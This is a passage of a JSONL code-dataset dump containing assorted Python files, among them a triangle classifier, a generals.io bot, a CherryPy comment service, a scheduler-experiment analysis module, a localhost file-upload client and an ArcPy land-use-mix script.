'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n for item in string:\n l=len(item)\n inter=alph.index(item[l-1])+alph.index(item[l-2])*2**5+alph.index(item[l-3])*2**10\n loc=inter%p\n if counter.count(loc)>0:\n probe=counter.count(loc)\n while counter.count(loc)!=0:\n loc=loc+probe**2\n probe+=1\n if loc>p:\n loc=loc%p\n counter.append(loc)\n for i in range(len(counter)-1):\n print(counter[i],end=\" \")\n print(counter[len(counter)-1])\n\nexam16() ","sub_path":"Code/CodeRecords/2962/60586/299890.py","file_name":"299890.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"597391069","text":"def getTriangle():\n a,b,c = input().split()\n a=int(a)\n b=int(b)\n c=int(c)\n if not a + b > c or not b + c > a or not c + a > b:\n print('1')\n elif a==b==c:\n print('2')\n elif a==b or a==c or b==c: \n print('3')\n else:\n print('4')\ngetTriangle() \n","sub_path":"week1/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"414591508","text":"\r\nimport pathing\r\nimport generals\r\nimport time\r\n\r\n# tile types\r\nempty = -1\r\nmountain = -2\r\nfog = -3\r\nobstacle = -4\r\n\r\n# game settings\r\nuserId = \"16141231\"\r\nname = \"careNo\"\r\ngameType = 'private'\r\nlobby = 'ihatebugs'\r\n\r\ngame = generals.Generals(userId, name, gameType, lobby)\r\n\r\nupdateTimes = []\r\nlongestUpdate = 0\r\n\r\nfor update in game.get_updates():\r\n\r\n\tcomplete = update['complete']\r\n\r\n\tif(complete):\r\n\t\tprint(\"replay:\", update['replay_url'])\r\n\t\tsum = 0\r\n\t\tfor n in times:\r\n\t\t\tsum += n\r\n\r\n\t\tprint(\"Avg Time:\", round(sum/len(times), 6))\r\n\t\tcontinue\r\n\r\n\tpi = update['player_index']\r\n\tgeneral = update['generals'][pi]\r\n\tterrain = update['tile_grid']\r\n\tarmies = update['army_grid']\r\n\tcities = update['cities']\r\n\tturn = update['turn']\r\n\r\n\tlandCount = update['lands'][pi]\r\n\r\n\t#print(\"landCount:\", landCount)\r\n\r\n\r\n\tif(turn > 26):\r\n\t\tstart = time.time()\r\n\t\tif(landCount < 35 or isEnemies(terrain, pi) == False):\r\n\t\t\t#print(isEnemies(terrain, pi))\r\n\t\t\tspread(armies, terrain, pi, general)\r\n\r\n\t\telse:\r\n\t\t\tattack(armies, terrain, general, pi)\r\n\r\n\r\n\r\n\t\tupdateTime = round(time.time() - start, 6)\r\n\t\tprint(\"updateTime:\", updateTime)\r\n\t\tif(updateTime < longestUpdate):\r\n\t\t\tlongestUpdate = updateTime\r\n\t\tupdateTimes.append(updateTime)\r\n\r\n","sub_path":"giobot.py","file_name":"giobot.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"542733178","text":"# coding: utf-8\n# This file is a part of VK4XMPP transport\n# © simpleApps, 2013.\n\ndef parseAttachments(self, msg):\n\tbody = str()\n\tif msg.has_key(\"attachments\"):\n\t\tif msg[\"body\"]:\n\t\t\tbody += _(\"\\nAttachments:\")\n\t\tattachments = msg[\"attachments\"]\n\t\tfor att in attachments:\n\t\t\tkey = att.get(\"type\")\n\t\t\tif key == \"wall\":\n\t\t\t\tatt[key][\"from_id\"] = abs(att[key][\"from_id\"])\n\t\t\t\tbody += \"https://vk.com/public%(from_id)s?w=wall-%(from_id)s_%(id)s\"\n\t\t\telif key == \"photo\":\n\t\t\t\tkeys = (\"src_xxxbig\", \"src_xxbig\", \"src_xbig\", \"src_big\", \"src\", \"url\", \"src_small\")\n\t\t\t\tfor dKey in keys:\n\t\t\t\t\tif att[key].has_key(dKey):\n\t\t\t\t\t\tbody += \"\\n\" + att[key][dKey]\n\t\t\t\t\t\tbreak\n\t\t\telif key == \"video\":\n\t\t\t\tbody += \"\\nVideo: http://vk.com/video%(owner_id)s_%(vid)s — %(title)s\"\n\t\t\telif key == \"audio\":\n\t\t\t\tbody += \"\\nAudio: %(performer)s — %(title)s — %(url)s\"\n\t\t\telif key == \"doc\":\n\t\t\t\tbody += \"\\nDocument: %(title)s — %(url)s\"\n\t\t\telse:\n\t\t\t\tbody += \"\\nUnknown attachment: \" + str(att[key])\n\t\t\tbody = body % att.get(key, {})\n\treturn body\n\nHandlers[\"msg01\"].append(parseAttachments)","sub_path":"extensions/attachments.py","file_name":"attachments.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"140717992","text":"from config import *\n\nimport cherrypy\n\nimport persistentdata\nimport pages\nimport util\n\nclass GetCommentServ(object):\n\tdef __init__(self):\n\t\tself.data = persistentdata.Get(\"comicdata\")\n\t\tself.comics = self.data.AddChild(\"comics\")\n\n\t\tself.commentdata = persistentdata.Get(\"commentdata\")\n\t\tself.blacklist = self.commentdata.AddChild(\"blacklist\")\n\t\tself.comments = self.commentdata.AddChild(\"comments\")\n \n\tdef GetComment(self, comicid, commentid):\n\t\tcomment = self.comments[comicid][commentid]\n\t\t\n\t\tif comment == None:\n\t\t\treturn \"\"\n\n\t\treturn pages.GetPart(\"comment\", **comment._dict)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef GetComments(self):\n\t\tparams = cherrypy.request.json\n\n\t\tcomicid = int(params[\"comicid\"])\n\n\t\tif comicid not in self.comments:\n\t\t\tself.comments.AddChild(comicid)\n\n\t\tif \"commentid\" in params:\n\t\t\tcommentid = int(params[\"commentid\"])\n\n\t\telse:\n\t\t\treturn {\"total\": len(self.comments[comicid])}\n\n\t\tif \"amount\" in params:\n\t\t\tamount = int(params[\"amount\"])\n\t\t\tamount = min(COMMENTSPERPAGE, amount)\n\t\t\tcomments = []\n\n\t\t\tlimit = amount + commentid\n\n\t\t\twhile commentid < limit:\n\t\t\t\tcomment = self.GetComment(comicid, commentid)\n\n\t\t\t\tif not comment:\n\t\t\t\t\tbreak\n\n\t\t\t\tcomments.append(comment)\n\t\t\t\tcommentid += 1\n\n\t\t\treturn {\"comments\": \"\\n\".join(comments), \"lastId\": commentid}\n\n\t\telse:\n\t\t\treturn {\"comment\" : self.GetComment(comicid, commentid)}\n\n\nclass MakeCommentServ(object):\n\tdef __init__(self):\n\t\tself.data = persistentdata.Get(\"comicdata\")\n\t\tself.comics = self.data.AddChild(\"comics\")\n\n\t\tself.commentdata = persistentdata.Get(\"commentdata\")\n\t\tself.blacklist = self.commentdata.AddChild(\"blacklist\")\n\t\tself.comments = self.commentdata.AddChild(\"comments\")\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef MakeComment(self):\n\t\tif cherrypy.request.remote.ip in self.blacklist:\n\t\t\treturn {\"alert\": \"Blacklisted\", \"success\": 0}\n\n\t\tparams = cherrypy.request.json\n\n\t\tcomicid = int(params[\"comicid\"])\n\n\t\tcontent = util.FormatHtml(util.UnescapeHtml(str(params[\"content\"])))\n\t\ttitle = util.EscapeHtml(str(params[\"title\"]))\n\t\tusername = util.EscapeHtml(str(params[\"username\"]))\n\n\t\tif not (title and username and content):\n\t\t\treturn {\"alert\": \"Missing feilds\", \"success\": 0}\n\n\t\tif len(title) > COMMENTTITLEMAX:\n\t\t\treturn {\"alert\": \"Comment title too long\", \"success\": 0}\n\n\t\tif len(content) > COMMENTCONTENTMAX:\n\t\t\treturn {\"alert\": \"Comment too long\", \"success\": 0}\n\n\t\tif len(username) > COMMENTUSERNAMEMAX:\n\t\t\treturn {\"alert\": \"Username too long\", \"success\": 0}\n\n\t\tcomiccomments = self.comments.AddChild(comicid)\n\n\t\tcommentid = len(comiccomments)\n\n\t\tcommentid = len(self.comments.AddChild(comicid))\n\t\tchild = comiccomments.AddChild(commentid)\n\n\t\tchild[\"content\"] = content\n\t\tchild[\"title\"] = title\n\t\tchild[\"username\"] = username\n\n\t\treturn {\"alert\": \"Successfully posted\", \"success\": 1, \"newid\": commentid}\n\n","sub_path":"datashock/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"240251442","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\ndataSet = {'Traditional': 1, 'Urban': 136, 'Alternative & Punk': 169, 'Classical': 4, 'Rock': 88, 'Electronica': 59, 'Jazz': 4, 'Other': 33, 'Soundtrack': 7, 'Pop': 135}\nfig = plt.figure()\n\nwidth = 0.75\nind = np.arange(len(dataSet.values()))\nplt.bar(ind, dataSet.values())\nplt.xticks(ind + width / 2, dataSet.keys())\n\nfig.autofmt_xdate()\n\nplt.savefig(\"figure.jpg\")","sub_path":"bargraph.py","file_name":"bargraph.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"570690220","text":"import os\nimport re\nimport ai_info\nimport global_config\nimport collections\nimport glob\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error\nfrom read_data.utils import *\nfrom read_data.perf import *\nfrom analyze_interference import computeExpectedCost\n\n# from read_data.resource import *\n# from analyze_interference import *\nNODE_TO_HOSTNAME = {\"puri\": \"puri.mimuw.edu.pl\", \"kulcha\": \"kulcha.mimuw.edu.pl\",\n \"baati\": \"ip_10_2_1_93\", \"dosa\": \"ip_10_2_1_91\"}\nHOSTNAME_TO_NODE = {host: node for node, host in NODE_TO_HOSTNAME.items()}\nMETRIC_CBTOOL_PREFIX = \"app_\"\n\n\nclass SchedulerExperimentRecord:\n def __init__(self, base_path, expid, composition_id, shuffle_id, custom_scheduler, ai_types, exp_series):\n self.base_path = base_path\n self.expid = expid\n self.path = os.path.join(base_path, expid)\n self.composition_id = composition_id\n self.shuffle_id = shuffle_id\n self.custom_scheduler = custom_scheduler\n self.ai_types = ai_types\n self.exp_series = exp_series\n self.split_interval = None\n self.checkOneAIOneHost()\n\n def getSplitInterval(self, df):\n mins = [df.loc[df[\"ai_name\"] == name, \"datetime\"].min() for name in df[\"ai_name\"].unique()]\n return max(mins) + pd.Timedelta(minutes=2), df[\"datetime\"].max()\n\n def aggregatePerfForAiNameAndMetric(self, df, d, metric, ai_name):\n df = df.loc[df[metric].notna(), :]\n if df.empty:\n msg = f\"Performance aggregation failed: no datapoints for \" \\\n f\"{d} metric={metric}\"\n raise ValueError(msg)\n return getPerfAggregateForMetricHelper(df, d, metric)\n\n def aggregatePerfForAiName(self, df, ai_name):\n d = {\"exp_id\": self.expid, \"composition_id\": self.composition_id, \"shuffle_id\": self.shuffle_id,\n \"scheduler\": self.custom_scheduler, \"ai_name\": ai_name}\n df = df.loc[(df[\"ai_name\"] == ai_name), :]\n host_names = df[\"host_name\"].unique()\n if len(host_names) != 1:\n raise KeyError(f\"Unexpected number of host names for single ai {len(host_names)}!=1\")\n d.update({\"host_name\": host_names[0]})\n ai_roles = df[\"role\"].unique()\n ai_types = [ai_info.AI_ROLE_TO_TYPE[role] for role in ai_roles]\n if len(ai_types) != 1:\n raise KeyError(f\"Unexpected number of ai types for single ai {len(ai_types)}!=1\")\n d.update({\"type\": ai_types[0]})\n for m in ai_info.AI_TYPE_TO_METRICS[ai_types[0]]:\n metric = f\"{METRIC_CBTOOL_PREFIX}{m}\"\n d = self.aggregatePerfForAiNameAndMetric(df, d, metric, ai_name)\n return toSingleRowDF(d)\n\n def aggregatePerf(self, df):\n self.split_interval = self.getSplitInterval(df)\n ts = self.split_interval\n df = df.loc[dfInterval(df, *ts), :]\n ai_names = df[\"ai_name\"].unique()\n results = pd.DataFrame()\n for ai_name in ai_names:\n result = self.aggregatePerfForAiName(df, ai_name)\n results = results.append(result, ignore_index=True)\n return results\n\n def computeAINameToHostAndTypeMap(self, df):\n df = df.loc[df[\"exp_id\"] == self.expid, :]\n ai_name_to_host_and_type = {}\n for _, row in df.iterrows():\n t = row[\"type\"]\n node = HOSTNAME_TO_NODE[row[\"host_name\"]]\n ai_name = row[\"ai_name\"]\n\n new_record = (node, t)\n present_record = ai_name_to_host_and_type.get(ai_name, new_record)\n if present_record != new_record:\n raise ValueError(f\"{ai_name} - two vms give different results {present_record} vs {new_record}\")\n ai_name_to_host_and_type[ai_name] = new_record\n return ai_name_to_host_and_type\n\n def checkOneAIOneHost(self):\n path = os.path.join(self.path, f\"VM_management_{self.expid}.csv\")\n df = pd.read_csv(path, skiprows=57)\n for ai in df[\"ai_name\"].unique():\n host_names = df.loc[(df[\"ai_name\"] == ai), \"host_name\"].unique()\n if len(host_names) != 1:\n raise ValueError(f\"Ai spans more than one host {self.expid} {ai} {host_names}\")\n\n\nclass SchedulerExperimentSeries:\n def __init__(self, base_path, config, ai_count, skip_compositions=()):\n self.type = \"scheduler\"\n self.base_path = base_path\n _, self.name = os.path.split(base_path)\n self.ai_role_count = ai_info.AI_ROLE_TO_COUNT.copy()\n self.rescale_map = config.rescale_map # hostname to exp_series\n self.ai_count = ai_count\n self.ai_types = config.tasks\n\n self.experiments = dict()\n self.dfs = {}\n self.df = None\n self.schedules = pd.DataFrame()\n\n if config.ai_role_count:\n self.ai_role_count.update(config.ai_role_count)\n\n for exp_match in self.getExperimentPathsMatches(base_path):\n composition_id, shuffle_id, custom_scheduler = exp_match.groups()\n composition_id = int(composition_id)\n if composition_id in skip_compositions:\n print(f\"Skipping composition {composition_id}\")\n continue\n shuffle_id = int(shuffle_id)\n custom_scheduler = \"\" if custom_scheduler is None else str(custom_scheduler)\n exp = SchedulerExperimentRecord(base_path, exp_match.string,\n composition_id, shuffle_id, custom_scheduler, self.ai_types, self)\n self.experiments[(composition_id, shuffle_id, custom_scheduler)] = exp\n self.readPerf()\n self.aggregatePerf()\n self.rescalePerf()\n self.computeCost()\n\n def getPerfMetricsForType(self, t1):\n return METRIC_CBTOOL_PREFIX + ai_info.AI_TYPE_TO_METRICS[t1][0]\n\n def readPerf(self):\n print(\"Getting perf data\")\n perf = pd.DataFrame()\n for k, exp in self.experiments.items():\n composition_id, shuffle_id, custom_scheduler = k\n df = readExp(exp)\n df[\"exp_id\"] = exp.expid\n df[\"composition_id\"] = composition_id\n df[\"shuffle_id\"] = shuffle_id\n df[\"custom_scheduler\"] = custom_scheduler\n perf = perf.append(df, ignore_index=True)\n self.dfs[\"perf\"] = perf\n\n def aggregatePerf(self):\n results = pd.DataFrame()\n perf = self.dfs[\"perf\"]\n for k, exp in self.experiments.items():\n df = perf.loc[(perf[\"exp_id\"] == exp.expid), :]\n result = exp.aggregatePerf(df)\n results = results.append(result, ignore_index=True)\n self.dfs[\"perf_agg\"] = results\n self.df = results\n\n def rescalePerf(self):\n for expid in self.df[\"exp_id\"].unique():\n df = self.df.loc[self.df[\"exp_id\"] == expid]\n for ai_name in df[\"ai_name\"].unique():\n df2 = df.loc[df[\"ai_name\"] == ai_name, :]\n host_names = df2[\"host_name\"].unique()\n if host_names.size != 1:\n raise ValueError(f\"Unexpected number of host names for single ai_name {ai_name} \"\n f\"{len(host_names)} != 1\")\n node = HOSTNAME_TO_NODE[host_names[0]]\n t = df2[\"type\"].min()\n for metric in ai_info.AI_TYPE_TO_METRICS[t]:\n factor = self.rescale_map[node][t][metric]\n select = (self.df[\"exp_id\"] == expid) & (df[\"ai_name\"] == ai_name)\n for mt in [\"avg_\", \"std_\"]:\n input_col = f\"{mt}{metric}\"\n output_col = f\"rescaled_{input_col}\"\n self.df.loc[select, output_col] = self.df.loc[select, input_col] / factor\n\n def computeCost(self):\n for expid in self.df[\"exp_id\"].unique():\n df = self.df.loc[self.df[\"exp_id\"] == expid]\n for ai_name in df[\"ai_name\"].unique():\n df2 = df.loc[df[\"ai_name\"] == ai_name, :]\n t = df2[\"type\"].min()\n metric = ai_info.AI_TYPE_TO_METRICS[t][0]\n output_col = \"cost\"\n input_col = f\"rescaled_avg_{metric}\"\n select = (self.df[\"exp_id\"] == expid) & (df[\"ai_name\"] == ai_name)\n if metric == \"throughput\":\n self.df.loc[select, output_col] = 1. / self.df.loc[select, input_col]\n else:\n self.df.loc[select, output_col] = self.df.loc[select, input_col]\n select = self.df.exp_id == expid\n self.df.loc[select, \"max_cost\"] = self.df.loc[select, \"cost\"].max()\n\n def printExperimentResults(self, savefig=False):\n xs = []\n ys_map = {s: [] for s in sorted(self.df[\"scheduler\"].unique())}\n for i, composition in enumerate(sorted(self.df[\"composition_id\"].unique())):\n xs.append(i)\n for scheduler in sorted(self.df[\"scheduler\"].unique()):\n select = (self.df[\"composition_id\"] == composition) & (self.df[\"scheduler\"] == scheduler)\n ys_map[scheduler].append(self.df.loc[select, \"max_cost\"].min())\n fig, ax = plt.subplots()\n plt.title(\"Scheduler cost\")\n for k, v in ys_map.items():\n ax.scatter(xs, v, label=k[1:])\n ax.set_ylabel(\"Max observed cost\")\n ax.legend()\n if savefig:\n file_name = f\"scheduler_results_{self.name}\"\n file_name = os.path.join(global_config.PLOTS_DIR, file_name)\n plt.savefig(file_name)\n else:\n plt.show()\n return xs, ys_map\n\n @staticmethod\n def getExperimentPathsMatches(base_path):\n path_regex = \"([0-9]{1,4})scheduler([0-9]{1,2})(_custom|_random|_round_robin|_default){0,1}\"\n\n def matchExpidRegex(e):\n i = e.split(\"/\")[-1]\n return re.fullmatch(path_regex, i)\n\n pattern = os.path.join(base_path, f\"*\")\n expids = glob.glob(pattern)\n matches = [matchExpidRegex(e) for e in expids]\n return [m for m in matches if bool(m)]\n\n def computeScheduleSummarySingle(self, exp, hosts, columns, index):\n result = pd.DataFrame(np.zeros((1, len(columns)), dtype=np.int32), index=index, columns=columns)\n ai_name_to_host_and_type = exp.computeAINameToHostAndTypeMap(self.df)\n\n for _, host_and_type in ai_name_to_host_and_type.items():\n result.loc[:, host_and_type] += 1\n result.loc[:, (host_and_type[0], \"all\")] += 1\n\n for host in hosts:\n for t in (\"all\",) + self.ai_types:\n result.loc[:, (\"all\", t)] += result.loc[:, (host, t)]\n return result\n\n # TODO shuffle id resilient\n def computeScheduleSummary(self):\n self.schedules = pd.DataFrame()\n hosts = list(self.df[\"host_name\"].unique())\n hosts = sorted([HOSTNAME_TO_NODE[h] for h in hosts])\n columns = pd.MultiIndex.from_product([[\"all\"] + hosts, (\"all\",) + tuple(self.ai_types)])\n for composition_id in sorted(self.df[\"composition_id\"].unique()):\n for shuffle_id in [0]:\n for scheduler in sorted(self.df[\"scheduler\"].unique()):\n exp = self.experiments[(composition_id, shuffle_id, scheduler)]\n index = pd.MultiIndex.from_tuples([(composition_id, scheduler)], names=[\"composition\", \"scheduler\"])\n result = self.computeScheduleSummarySingle(exp, hosts, columns, index)\n self.schedules = self.schedules.append(result)\n\n def extractNodeToLoads(self, composition_id, shuffle_id, scheduler):\n results = {}\n schedule = self.schedules.loc[(composition_id, scheduler)]\n hosts = [h for h in schedule.index.levels[0] if h != \"all\"]\n for host in hosts:\n result = np.zeros(len(self.ai_types))\n for i, ai_type in enumerate(self.ai_types):\n result[i] = schedule[(host, ai_type)]\n results[host] = result\n return results\n\n def extractActualCosts(self, composition_id, shuffle_id, scheduler):\n xs = []\n values = []\n df = self.df\n select = (df[\"composition_id\"] == composition_id) & (df[\"shuffle_id\"] == shuffle_id) & (df[\"scheduler\"] == scheduler)\n df = df.loc[select, :]\n for _, row in df.iterrows():\n values.append(row[\"cost\"])\n node = HOSTNAME_TO_NODE[row[\"host_name\"]]\n t = row[\"type\"]\n xs.append(f\"{node} {t}\")\n return xs, values\n\n\nclass SchedulerMeanMetricComputer:\n RecordId = collections.namedtuple(\"RecordId\", \"host type composition scheduler\")\n\n def __init__(self, ai_types, node_to_coeffs, xs, ys_actual, ys_expected):\n self.ai_types = ai_types\n self.node_to_coeffs = node_to_coeffs\n self.xs = xs\n self.ys_actual = ys_actual\n self.ys_expected = ys_expected\n\n def computeMetricForType(self, t=None, metric_fn=mean_squared_error):\n data = self.getDataForType(t)\n _, ys_actual, ys_expected = zip(*data)\n return metric_fn(ys_actual, ys_expected)\n\n def getDataForType(self, t):\n data = zip(self.xs, self.ys_actual, self.ys_expected)\n if t is None:\n return data\n return [(x, y1, y2) for (x, y1, y2) in data if x.type == t]\n\n def computeMetrics(self, metric_fn=mean_squared_error):\n result = dict()\n result[\"all\"] = self.computeMetricForType(metric_fn=metric_fn)\n for t in self.ai_types:\n result[t] = self.computeMetricForType(t, metric_fn)\n return result\n\n @staticmethod\n def createFromExpSeries(exp_series, node_to_coeffs):\n xs_result, ys_actual_result, ys_expected_result = [], [], []\n df = exp_series.df\n\n def toRecordId(x, c, s):\n host, t = x.split(\" \")\n return SchedulerMeanMetricComputer.RecordId(host, t, composition, scheduler)\n\n for composition in df[\"composition_id\"].unique():\n for scheduler in df[\"scheduler\"].unique():\n node_to_loads = exp_series.extractNodeToLoads(composition, 0, scheduler)\n xs, ys_expected = computeExpectedCostMultipleNodes(exp_series.ai_types, node_to_loads, node_to_coeffs)\n expected_cost_map = dict(zip(xs, ys_expected))\n\n xs, ys_actual = exp_series.extractActualCosts(composition, 0, scheduler)\n for x, y_actual in zip(xs, ys_actual):\n xs_result.append(toRecordId(x, composition, scheduler))\n ys_actual_result.append(y_actual)\n ys_expected_result.append(expected_cost_map[x])\n return SchedulerMeanMetricComputer(exp_series.ai_types, node_to_coeffs, xs_result,\n ys_actual_result, ys_expected_result)\n\n\ndef computeExpectedCostMultipleNodes(ai_types, node_to_loads, node_to_coefficients):\n values = []\n xs = []\n for node in node_to_loads.keys():\n values.extend(computeExpectedCost(node_to_loads[node], node_to_coefficients[node]))\n xs.extend([f\"{node} {t}\" for t in ai_types])\n return xs, values\n\n\ndef plotActualVsExpectedCost(exp_series, node_to_coefficients, composition_id, savefig=False):\n k = len(exp_series.df[\"scheduler\"].unique())\n fig, axs = plt.subplots(1, k, figsize=(k * 5, 4))\n schedulers, actual_res, model_res = [], [], []\n\n def updateResultList(result, result_list, ymax):\n ymax = max([ymax] + result[1])\n result_list.append(result)\n return ymax\n\n ymax = 0\n for i, scheduler in enumerate(sorted(exp_series.df[\"scheduler\"].unique())):\n schedulers.append(scheduler)\n actual = exp_series.extractActualCosts(composition_id, 0, scheduler)\n ymax = updateResultList(actual, actual_res, ymax)\n\n node_to_loads = exp_series.extractNodeToLoads(composition_id, 0, scheduler)\n model = computeExpectedCostMultipleNodes(exp_series.ai_types, node_to_loads, node_to_coefficients)\n ymax = updateResultList(model, model_res, ymax)\n\n for i, (scheduler, actual, model) in enumerate(zip(schedulers, actual_res, model_res)):\n xs_model, values_model = model\n xs_actual, values_actual = actual\n ax = axs[i]\n\n ax.set_title(f\"{scheduler[1:]} scheduler\")\n ax.set_ylabel(\"Performance cost\")\n ax.scatter(xs_model, values_model, label=\"predicted\")\n ax.scatter(xs_actual, values_actual, label=\"observed\")\n ax.tick_params('x', labelrotation=60)\n ax.set_ylim(ymin=0, ymax=ymax)\n ax.legend()\n\n if savefig:\n file_name = f\"scheduler_observed_vs_predicted_{exp_series.name}_{composition_id}\"\n file_name = os.path.join(global_config.PLOTS_DIR, file_name)\n plt.savefig(file_name)\n else:\n plt.show()\n\n return schedulers, actual_res, model_res\n\n","sub_path":"myscripts/analyze_scheduler.py","file_name":"analyze_scheduler.py","file_ext":"py","file_size_in_byte":16871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198729193","text":"#!/usr/bin/env python\nimport socket\nimport os\nimport sys\n\n\nHOST = '127.0.0.1'\nPORT = 10037\n\ndef file_client():\n ''' file Server 的 client 端 '''\n\n file_in = input('input > ')\n # win系统需要把\\\\字符进行处理替换\n file_in = file_in.replace(\"\\\\\", \"/\")\n #print(file_in)\n # 判断上传文件是否存在\n if not os.path.isfile(file_in):\n print(\"该文件不存在\")\n sys.exit()\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((HOST, PORT))\n # 获取到文件名\n file_in_dirname = os.path.basename(file_in)\n # filename + 文件名 发送给服务端进行正则匹配处理\n file_in_name =\"filename\" + file_in_dirname.strip()\n # 发送文件名\n s.sendall(file_in_name.encode())\n # 传输文件\n with open(file_in, \"rb\") as f:\n datas = f.read()\n s.sendall(datas)\n f.close()\n s.close()\n\n\nif __name__ == '__main__':\n file_client()","sub_path":"week02/cookie-client-file.py.py","file_name":"cookie-client-file.py.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"365609168","text":"'''\r\nCreated on 20141016\r\n\r\n@author: xiaogelunbu\r\n'''\r\n\r\n\r\nimport arcpy\r\nfrom arcpy import env\r\nimport math\r\nimport os\r\n\r\n\r\n\r\narcpy.env.overwriteOutput=True\r\ntempData = arcpy.env.scratchGDB+os.path.sep+\"output\"\r\n\r\n\r\nfcparcel=arcpy.GetParameterAsText(0)\r\nfcpoi1=arcpy.GetParameterAsText(1)\r\nfcpoi2=arcpy.GetParameterAsText(2)\r\nfcpoi3=arcpy.GetParameterAsText(3)\r\nfcpoi4=arcpy.GetParameterAsText(4)\r\naddfieldname=arcpy.GetParameterAsText(5)\r\n\r\n\r\ntargetFeatures = fcparcel\r\njoinFeatures1 = fcpoi1\r\njoinFeatures2 = fcpoi2\r\njoinFeatures3 = fcpoi3\r\njoinFeatures4 = fcpoi4\r\na=0\r\n\r\n#Run the Spatial Join tool, using the defaults for the join operation and join type\r\narcpy.SpatialJoin_analysis(targetFeatures, joinFeatures1, tempData, \"#\", \"#\",\"CONTAINS\")\r\narcpy.JoinField_management(fcparcel, \"FID\", tempData, \"TARGET_FID\", [\"Join_Count\"])\r\narcpy.AddField_management(fcparcel,\"poi1count\",\"FLOAT\")\r\narcpy.CalculateField_management (fcparcel, \"poi1count\" , \"!Join_Count!\" ,\"PYTHON_9.3\")\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n a=a+row.getValue(\"Join_Count\")\r\narcpy.DeleteField_management(fcparcel, \"Join_Count\")\r\narcpy.Delete_management(tempData)\r\n\r\n\r\narcpy.SpatialJoin_analysis(targetFeatures, joinFeatures2, tempData, \"#\", \"#\",\"CONTAINS\")\r\narcpy.JoinField_management(fcparcel, \"FID\", tempData, \"TARGET_FID\", [\"Join_Count\"])\r\narcpy.AddField_management(fcparcel,\"poi2count\",\"FLOAT\")\r\narcpy.CalculateField_management (fcparcel, \"poi2count\" , \"!Join_Count!\" ,\"PYTHON_9.3\")\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n a=a+row.getValue(\"Join_Count\")\r\narcpy.DeleteField_management(fcparcel, \"Join_Count\")\r\narcpy.Delete_management(tempData)\r\n\r\n\r\narcpy.SpatialJoin_analysis(targetFeatures, joinFeatures3, tempData, \"#\", \"#\",\"CONTAINS\")\r\narcpy.JoinField_management(fcparcel, \"FID\", tempData, \"TARGET_FID\", [\"Join_Count\"])\r\narcpy.AddField_management(fcparcel,\"poi3count\",\"FLOAT\")\r\narcpy.CalculateField_management (fcparcel, \"poi3count\" , \"!Join_Count!\" ,\"PYTHON_9.3\")\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n a=a+row.getValue(\"Join_Count\")\r\narcpy.DeleteField_management(fcparcel, \"Join_Count\")\r\narcpy.Delete_management(tempData)\r\n\r\n\r\narcpy.SpatialJoin_analysis(targetFeatures, joinFeatures4, tempData, \"#\", \"#\",\"CONTAINS\")\r\narcpy.JoinField_management(fcparcel, \"FID\", tempData, \"TARGET_FID\", [\"Join_Count\"])\r\narcpy.AddField_management(fcparcel,\"poi4count\",\"FLOAT\")\r\narcpy.CalculateField_management (fcparcel, \"poi4count\" , \"!Join_Count!\" ,\"PYTHON_9.3\")\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n a=a+row.getValue(\"Join_Count\")\r\narcpy.DeleteField_management(fcparcel, \"Join_Count\")\r\narcpy.Delete_management(tempData)\r\n\r\n\r\narcpy.DeleteField_management(fcparcel,addfieldname)\r\narcpy.AddField_management(fcparcel,addfieldname,\"FLOAT\")\r\n\r\ncur = arcpy.UpdateCursor(fcparcel)\r\nfor row in cur: \r\n if a!=0:\r\n row.setValue(addfieldname, -1.0*((row.poi1count/a)*math.log(row.poi1count/a)+(row.poi2count/a)*math.log(row.poi2count/a)+(row.poi3count/a)*math.log(row.poi3count/a)+(row.poi4count/a)*math.log(row.poi4count/a))/math.log(4))\r\n cur.updateRow(row)\r\n else:\r\n row.setValue(addfieldname, 0)\r\n cur.updateRow(row)\r\n\r\n\r\narcpy.DeleteField_management(fcparcel, [\"poi1count\",\"poi2count\",\"poi3count\"\"poi4count\"])\r\narcpy.Delete_management(tempData)\r\n\r\n\r\n\r\n","sub_path":"05Land-Use-Mix1/05Land-Use-Mix1.py","file_name":"05Land-Use-Mix1.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"237503305","text":"# re模块其他用法\nimport re\n\n\ndef main():\n # 查找\n ret = re.search(r\"\\d+\", \"hello 100,200\")\n # 查找所有\n ret2 = re.findall(r\"\\d+\", \"hello 100,200\")\n # 替换\n ret3 = re.sub(r\"\\d+\", \"300\", \"hello 100,200\")\n # 切割字符串,用空格和:冒号分割字符串\n ret4 = re.split(r\":| \", \"info:dave 